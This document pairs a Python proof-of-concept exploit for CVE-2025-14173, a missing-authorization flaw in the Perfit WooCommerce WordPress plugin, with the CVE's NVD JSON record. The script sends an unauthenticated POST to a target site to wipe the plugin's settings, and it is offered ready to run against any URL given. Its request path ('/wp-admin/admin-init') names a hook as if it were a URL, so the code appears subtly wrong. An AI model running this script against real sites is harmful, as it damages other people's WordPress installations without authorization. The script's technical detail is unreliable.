CVE-2025-14173

import requests import sys # CVE-2025-14173 PoC - Perfit WooCommerce Missing Authorization # Target: WordPress site with Perfit WooCommerce plugin <= 1.0.1 def exploit_cve_2025_14173(target_url): """ Exploit missing authorization in Perfit WooCommerce plugin Allows unauthenticated deletion of plugin settings via action parameter """ # Target the admin_init hook with logout action exploit_url = f"{target_url.rstrip('/')}/wp-admin/admin-init" # Payload to trigger logout function and delete plugin settings payload = { 'action': 'perfit_logout' # Triggers the vulnerable logout function } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-14173...") print(f"[*] Sending request to: {exploit_url}") try: # Send POST request without authentication response = requests.post(exploit_url, data=payload, timeout=30) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code == 200: print("[+] Request sent successfully - plugin settings may be deleted") print("[*] Verify by checking plugin settings page") else: print("[-] Unexpected response") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_14173(target)

{"cve": {"id": "CVE-2025-14173", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:11.997", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Perfit WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0.1. This is due to missing authorization checks on the `logout` function called via the `actions` function hooked to `admin_init`. This makes it possible for unauthenticated attackers to delete arbitrary plugin settings via the `action` parameter."}, {"lang": "es", "value": "El plugin Perfit WooCommerce para WordPress es vulnerable a la falta de autorización en todas las versiones hasta la 1.0.1, inclusive. Esto se debe a la falta de comprobaciones de autorización en la función 'logout' llamada a través de la función 'actions' enganchada a 'admin_init'. Esto hace posible que atacantes no autenticados eliminen configuraciones arbitrarias del plugin a través del parámetro 'action'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/perfit-woocommerce/tags/1.0.1/includes/class-wcp-settings-tab.php#L102", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/perfit-woocommerce/trunk/includes/class-wcp-settings-tab.php#L102", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cb141b46-2585-4b58-8d91-0cdb275348a1?source=cve", "source": "[email protected]"}]}}